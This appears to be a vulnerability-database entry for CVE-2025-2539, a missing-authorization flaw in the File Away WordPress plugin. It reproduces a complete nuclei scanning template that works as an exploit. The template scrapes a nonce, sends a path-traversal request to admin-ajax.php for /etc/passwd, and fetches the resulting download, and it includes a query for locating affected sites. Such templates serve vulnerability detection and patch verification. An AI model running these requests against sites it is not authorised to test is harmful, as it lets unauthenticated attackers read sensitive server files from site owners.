CVE-2025-2539: File Away <= 3.9.9.0.1 - Missing Authorization to Unauthenticated Arbitrary File Read

日期: 2025-08-01 | 影响软件: File Away | POC: 已公开

漏洞描述

The File Away plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the ajax() function in all versions up to, and including, 3.9.9.0.1. This makes it possible for unauthenticated attackers, leveraging the use of a reversible weak algorithm, to read the contents of arbitrary files on the server, which can contain sensitive information.

PoC代码[已公开]

id: CVE-2025-2539

info:
  name: File Away <= 3.9.9.0.1 - Missing Authorization to Unauthenticated Arbitrary File Read
  author: iamnoooob,rootxharsh,pdresearch
  severity: high
  description: |
    The File Away plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the ajax() function in all versions up to, and including, 3.9.9.0.1. This makes it possible for unauthenticated attackers, leveraging the use of a reversible weak algorithm,  to read the contents of arbitrary files on the server, which can contain sensitive information.
  reference:
    - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/file-away/file-away-39901-missing-authorization-to-unauthenticated-arbitrary-file-read
    - https://plugins.trac.wordpress.org/browser/file-away/trunk/lib/cls/class.fileaway_encrypted.php
    - https://plugins.trac.wordpress.org/browser/file-away/trunk/lib/cls/class.fileaway_stats.php
    - https://wordpress.org/plugins/file-away/#developers
    - https://www.wordfence.com/threat-intel/vulnerabilities/id/5b23bd5c-db27-4d63-8461-1f36958a2ff6?source=cve
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2025-2539
    cwe-id: CWE-327
    epss-score: 0.20811
    epss-percentile: 0.95409
  metadata:
    verified: true
    max-request: 1
    publicwww-query: "/wp-content/plugins/file-away/"
  tags: cve,cve2025,lfi,file-away,wordpress,wp-plugin,wp

flow: http(1) && http(2) && http(3)

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

    extractors:
      - type: regex
        name: nonce
        group: 1
        regex:
          - 'fileaway_stats.*admin-ajax.php","nonce":"([0-9a-zA-Z]+)"}'
        internal: true

  - raw:
      - |
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8

        action=fileaway-stats&nonce={{nonce}}&file=/../../../../../../../../etc/passwd

    matchers:
      - type: word
        part: body
        internal: true
        words:
          - fileaway_download

    extractors:
      - type: regex
        part: body
        internal: true
        name: download_url
        group: 1
        regex:
          - '".*(\?.*?)"'

  - raw:
      - |
        GET /{{download_url}} HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - 'root:.*:0:0:'

      - type: word
        part: content_type
        words:
          - "application/force-download"
# digest: 490a004630440220632848518a149310a21da2a4df7f3645437c863c984e5c6aa2e3684362c19c1c02203e3c86dab40f438a8f9d6099abfb380fe3acf666792d4560a2d728d1304b2a57:922c64590222798bb761d5b6d8e72950
来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2025/CVE-2025-2539.yaml

相关漏洞推荐